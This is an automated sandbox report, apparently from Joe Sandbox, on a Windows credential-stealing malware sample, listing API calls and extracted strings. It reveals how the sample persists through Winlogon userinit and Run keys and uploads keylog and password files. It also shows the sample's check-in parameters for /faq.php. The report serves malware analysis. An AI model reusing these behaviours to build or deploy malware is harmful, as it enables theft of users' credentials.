                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02644245
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000BED), ref: 0264425D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02644260
                                                                                                                                                                                                              • memset.MSVCRT ref: 02644270
                                                                                                                                                                                                              • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 0264428A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644297
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264429A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026442AB
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026442AE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000A9), ref: 026442DA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026442DD
                                                                                                                                                                                                              • memset.MSVCRT ref: 026442F4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 02644346
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264434D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0264435E
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02644365
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 0264439D
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 026443B0
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 026443C8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026443DA
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026443DD
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026443EA
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026443ED
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 026443F9
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026443FC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02644409
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0264440C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(026458F7,00000000,00000000,00000001), ref: 0264446E
                                                                                                                                                                                                              • LockFile.KERNEL32(026458F7,00000000,00000000,00000001,00000000), ref: 0264447E
                                                                                                                                                                                                              • WriteFile.KERNEL32(026458F7,00000000,00000001,00000000,00000000), ref: 0264448D
                                                                                                                                                                                                              • UnlockFile.KERNEL32(026458F7,026458F7,00000000,00000001,00000000), ref: 0264449D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026444AC
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026444AF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026444BC
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026444BF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate$File$Allocmemset$Tablehtons$LockPointerUnlockWrite_snprintf
                                                                                                                                                                                                              • String ID: CLOSED$CLOSE_WAIT$CLOSING$DELETE_TCB$ESTAB$FIN_WAIT1$FIN_WAIT2$LAST_ACK$LISTEN$SYN_RCVD$SYN_SENT$TCP%s:%d%s:%d%s$TIME_WAIT$netstat{ProtoLocal addressRemote addressState
                                                                                                                                                                                                              • API String ID: 2439004899-2402783461
                                                                                                                                                                                                              • Opcode ID: fbb96a46a14fea72c1d3d78a56a00a4e95238e4fadeb39ea0de24ccd0e6e464a
                                                                                                                                                                                                              • Instruction ID: 623660b6bb127f9c1442b058ca2b1c7110960fb8f85055ad9f664ba71ee7951a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fbb96a46a14fea72c1d3d78a56a00a4e95238e4fadeb39ea0de24ccd0e6e464a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32A1D271E40205BBDB109FA19C9DFAF7F78EB85711F964608F946AB280DF709440CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0268FB68,76F90F00,00000000,76F92F00), ref: 026539E9
                                                                                                                                                                                                              • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 026539FB
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02653A1B
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02653A2B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02653B00
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02653B4C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02653B59
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000000), ref: 02653B9A
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02653BCA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02653C72
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02653C7F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02653C85
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02653CA2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02653CB9
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02654076
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 02654083
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02654096
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 026540A3
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026540C7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026540CA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026540D6
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026540D9
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026540E7
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 026540EA
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 026540F6
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 026540F9
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0268FB68), ref: 02654100
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Path$Process$BackslashCurrentDirectory$AttributesCriticalDeleteFreeSectionValidate_snprintf$AllocCopyCountEnterExistsFolderLeaveTickVirtual
                                                                                                                                                                                                              • String ID: -----------------------------$%s%s$%s%u.zip$--$-----------------------------$4864fbb3d37ea29$7577580Fa$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$keylog.txt$passwords.txt
                                                                                                                                                                                                              • API String ID: 2790020909-724247853
                                                                                                                                                                                                              • Opcode ID: 3d06e6f8260920d76ba90c32a92257212dc74051e97ea76084b7dc0de7226c42
                                                                                                                                                                                                              • Instruction ID: 187100a1c694c8afc250fb93d83d64eb8078bb232d28f0e53619220625e5bb6f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d06e6f8260920d76ba90c32a92257212dc74051e97ea76084b7dc0de7226c42
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66227D319042665BCF158F348CA4BFB7BB6AF45784F544AC4EC869B380EB32D999C790

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 02653BCA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02653C72
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02653C7F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02653C85
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02653CA2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02653CB9
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02653CD6
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 02653D05
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileVirtual$AllocAttributesBackslashCountDeleteFreePathTick_snprintflstrcpyn
                                                                                                                                                                                                              • String ID: -----------------------------$%s%u.zip$--$-----------------------------$4864fbb3d37ea29$C:\Users\user\AppData\Roaming\$Content-Disposition: form-data; name="file"; filename="report"$Content-Disposition: form-data; name="pcname"$Content-Type: text/plain$DEBUG$passwords.txt
                                                                                                                                                                                                              • API String ID: 3203035732-3238387357
                                                                                                                                                                                                              • Opcode ID: 7d6e64504cde920c5bde78660a47d5dafb9d1b62ed8df82251e314f8aac87e90
                                                                                                                                                                                                              • Instruction ID: c8e09dd78a8e2b03c485a9164b5f98322716090f44a0b11e399dd37906841c5a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d6e64504cde920c5bde78660a47d5dafb9d1b62ed8df82251e314f8aac87e90
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4F14C319042A69BCF168F308CA4BFBBBA6AF45744F5446C4EC869B340DF72D999C790

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe), ref: 02657DFE
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?), ref: 02657E27
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02657E47
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000010), ref: 02657E64
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02657E6B
                                                                                                                                                                                                              • memset.MSVCRT ref: 02657E7F
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,userinit,00000000,00000000,00000000,00000000), ref: 02657E99
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02657EA1
                                                                                                                                                                                                              • RegSetValueExA.KERNEL32(?,userinit,00000000,00000001,00000000,00000002), ref: 02657F40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02657F4F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02657F52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02657F5F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02657F62
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02657F6C
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F013F,?), ref: 02657F8D
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,C:\Windows\apppatch\svchost.exe), ref: 02657FBD
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(?), ref: 02657FC7
                                                                                                                                                                                                              • RegCloseKey.KERNEL32(?), ref: 02657FD1
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02657FD7
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 0265800D
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0265801C
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02658039
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02658044
                                                                                                                                                                                                              • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02658067
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                              • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                              • API String ID: 2213373080-1283825033
                                                                                                                                                                                                              • Opcode ID: b8797dc301788b67caae7b42971bcb7885d6a7ffe9a874d08d30a8dfd4f55591
                                                                                                                                                                                                              • Instruction ID: 1cca92232a9c9e0faab944deac8688c873e1158fe328e0650199f66c438bcab5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8797dc301788b67caae7b42971bcb7885d6a7ffe9a874d08d30a8dfd4f55591
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC710235A80356FBEB21DB649C98FAFBB69EF40744F514644FD02EB280DBB09945C7A0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              [Figure: control-flow graph; legend: Executed / Not Executed]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02656991
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 026569C7
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 026569CE
                                                                                                                                                                                                              • memset.MSVCRT ref: 026569E3
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 026569F2
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 02656A06
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02656A2C
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02656A6A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02656AA6
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 02656ABB
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02656AD3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02656AE2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02656AEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02656B64
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02656B67
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02656B74
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02656B77
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001,/faq.php,?,00000001,?,026896FC,00000001,00000000,00000000,/faq.php,?,00000001), ref: 02656BED
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02656BF0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02656BFD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02656C00
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,?,00000001,00000000), ref: 02656C0F
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02656C1C
                                                                                                                                                                                                              • Sleep.KERNEL32(?,00000001,/faq.php,?,00000001,?,026896FC,00000001,00000000,00000000,/faq.php,?,00000001,?,026896FC,00000001), ref: 02656C61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileProcess$AttributesDeleteFreeSleepTempValidatememset$AdminAllocCountInformationNamePathTickTimeUserZone_snprintf
                                                                                                                                                                                                              • String ID: %2b$/faq.php$id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
                                                                                                                                                                                                              • API String ID: 889229162-4291654836
                                                                                                                                                                                                              • Opcode ID: 029cd859e11e542fabf66435c87c5f9158f72f5027974c433cd42ba19dea5ff0
                                                                                                                                                                                                              • Instruction ID: bf7aaba18e5f2dfd03d0644dacbc657913e864ff0af3a9783ec6d3b54ad4d8d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 029cd859e11e542fabf66435c87c5f9158f72f5027974c433cd42ba19dea5ff0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 97810771A81225ABDB249F74CD49FEE7B7D9F44300F854694ED06EB280EF708981CBA1

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              [Figure: control-flow graph; legend: Executed / Not Executed]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 026466B0
                                                                                                                                                                                                                • Part of subcall function 02654AB0: memset.MSVCRT ref: 02654AED
                                                                                                                                                                                                                • Part of subcall function 02654AB0: GetProcessHeap.KERNEL32(00000008,00000017,?,?,00000000), ref: 02654B27
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02654B2E
                                                                                                                                                                                                                • Part of subcall function 02654AB0: memset.MSVCRT ref: 02654B3E
                                                                                                                                                                                                                • Part of subcall function 02654AB0: memcpy.MSVCRT(00000000,?,00000004,?,?,00000000), ref: 02654B5D
                                                                                                                                                                                                                • Part of subcall function 02654AB0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02654BC2
                                                                                                                                                                                                              • calloc.MSVCRT ref: 0264670F
                                                                                                                                                                                                              • exit.MSVCRT ref: 0264671F
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02646729
                                                                                                                                                                                                              • exit.MSVCRT ref: 02646734
                                                                                                                                                                                                              • calloc.MSVCRT ref: 0264674F
                                                                                                                                                                                                              • exit.MSVCRT ref: 0264675C
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02646766
                                                                                                                                                                                                              • exit.MSVCRT ref: 02646771
                                                                                                                                                                                                              • calloc.MSVCRT ref: 02646794
                                                                                                                                                                                                              • exit.MSVCRT ref: 026467A1
                                                                                                                                                                                                              • calloc.MSVCRT ref: 026467AB
                                                                                                                                                                                                              • exit.MSVCRT ref: 026467B6
                                                                                                                                                                                                              • calloc.MSVCRT ref: 026467D9
                                                                                                                                                                                                              • exit.MSVCRT ref: 026467E6
                                                                                                                                                                                                              • calloc.MSVCRT ref: 026467F0
                                                                                                                                                                                                              • exit.MSVCRT ref: 026467FF
                                                                                                                                                                                                                • Part of subcall function 02654AB0: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02654BE1
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02654C19
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02654C4A
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02654C5E
                                                                                                                                                                                                                • Part of subcall function 02654AB0: _snprintf.MSVCRT ref: 02654C7C
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02654C94
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000004), ref: 02654CAA
                                                                                                                                                                                                                • Part of subcall function 02654AB0: HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,00000000), ref: 02654CCD
                                                                                                                                                                                                                • Part of subcall function 02654AB0: CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,?,?,00000000), ref: 02654D05
                                                                                                                                                                                                              • _strrev.MSVCRT ref: 02646869
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001,?), ref: 0264692C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264692F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0264693C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0264693F
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?,00000000,00000001,00000000,/login.php,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0264694A
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,?,?), ref: 0264695B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,?), ref: 02646962
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • /login.php, xrefs: 026466C1, 026466D8
                                                                                                                                                                                                              • 10001, xrefs: 0264682A
                                                                                                                                                                                                              • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 0264680D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: callocexit$HeapHttp$Request$File$HeadersProcessmemset$InternetOpen$AllocAttributesConnectCreateDeleteExistsFreeInfoPathQuerySendValidate_snprintf_strrevmemcpy
                                                                                                                                                                                                              • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02643106
                                                                                                                                                                                                                • Part of subcall function 02664FF0: memset.MSVCRT ref: 02665023
                                                                                                                                                                                                                • Part of subcall function 02664FF0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02665032
                                                                                                                                                                                                                • Part of subcall function 02664FF0: RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02665039
                                                                                                                                                                                                                • Part of subcall function 02664FF0: memset.MSVCRT ref: 02665051
                                                                                                                                                                                                                • Part of subcall function 02664FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02665068
                                                                                                                                                                                                                • Part of subcall function 02664FF0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0266506E
                                                                                                                                                                                                                • Part of subcall function 02664FF0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 0266508F
                                                                                                                                                                                                                • Part of subcall function 02664FF0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026650B6
                                                                                                                                                                                                                • Part of subcall function 02664FF0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026650CA
                                                                                                                                                                                                                • Part of subcall function 026650F0: memset.MSVCRT ref: 02665124
                                                                                                                                                                                                                • Part of subcall function 026650F0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02665133
                                                                                                                                                                                                                • Part of subcall function 026650F0: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0266513A
                                                                                                                                                                                                                • Part of subcall function 026650F0: memset.MSVCRT ref: 02665152
                                                                                                                                                                                                                • Part of subcall function 026650F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02665169
                                                                                                                                                                                                                • Part of subcall function 026650F0: GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0266516F
                                                                                                                                                                                                                • Part of subcall function 026650F0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02665190
                                                                                                                                                                                                                • Part of subcall function 026650F0: StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026651B7
                                                                                                                                                                                                                • Part of subcall function 026650F0: lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026651CB
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,76F92F70,00000000), ref: 02643144
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?,?,?,76F92F70,00000000), ref: 02643151
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,76F92F70,00000000), ref: 02643168
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,76F92F70,00000000), ref: 0264318E
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,?,?,?,?,76F92F70,00000000), ref: 026431AF
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,76F92F70,00000000), ref: 026431B9
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,76F92F70,00000000), ref: 026431DF
                                                                                                                                                                                                              • CharUpperA.USER32(00000000,?,?,?,76F92F70,00000000), ref: 026431E8
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02643201
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264325F
